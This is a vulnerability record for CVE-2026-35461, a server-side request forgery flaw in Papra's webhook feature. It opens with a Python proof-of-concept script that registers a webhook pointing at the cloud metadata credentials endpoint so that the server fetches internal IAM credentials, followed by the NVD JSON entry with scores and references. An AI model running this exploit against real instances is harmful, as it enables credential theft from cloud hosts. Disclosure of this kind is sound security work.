CVE-2026-35461

import requests # Target URL of the Papra instance target_url = "http://target-papra-instance.com/api/webhooks" # Attacker's session cookie (obtained after authentication) cookies = { "session": "authenticated_session_cookie_here" } # Malicious payload pointing to internal metadata service or localhost internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Data to register the malicious webhook webhook_data = { "url": internal_target, "events": ["document.created"] } try: # Send request to register the webhook response = requests.post(target_url, json=webhook_data, cookies=cookies) if response.status_code == 200: print("[+] Malicious webhook registered successfully.") print("[+] Trigger a document event to force the server to send a request to:", internal_target) else: print("[-] Failed to register webhook.") print("Status code:", response.status_code) print("Response:", response.text) except Exception as e: print("Error:", e)

{"cve": {"id": "CVE-2026-35461", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:44.047", "lastModified": "2026-04-24T15:29:00.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Papra is a minimalistic document management and archiving platform. Prior to 26.4.0, the Papra webhook system allows authenticated users to register arbitrary URLs as webhook endpoints with no validation of the destination address. The server makes outbound HTTP POST requests to registered URLs, including localhost, internal network ranges, and cloud provider metadata endpoints, on every document event. This vulnerability is fixed in 26.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:papra:papra:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4.0", "matchCriteriaId": "D2F10801-36E9-47AD-AD2D-DA4709B67B72"}]}]}], "references": [{"url": "https://github.com/papra-hq/papra/security/advisories/GHSA-cjw7-qg95-58mq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/papra-hq/papra/security/advisories/GHSA-cjw7-qg95-58mq", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}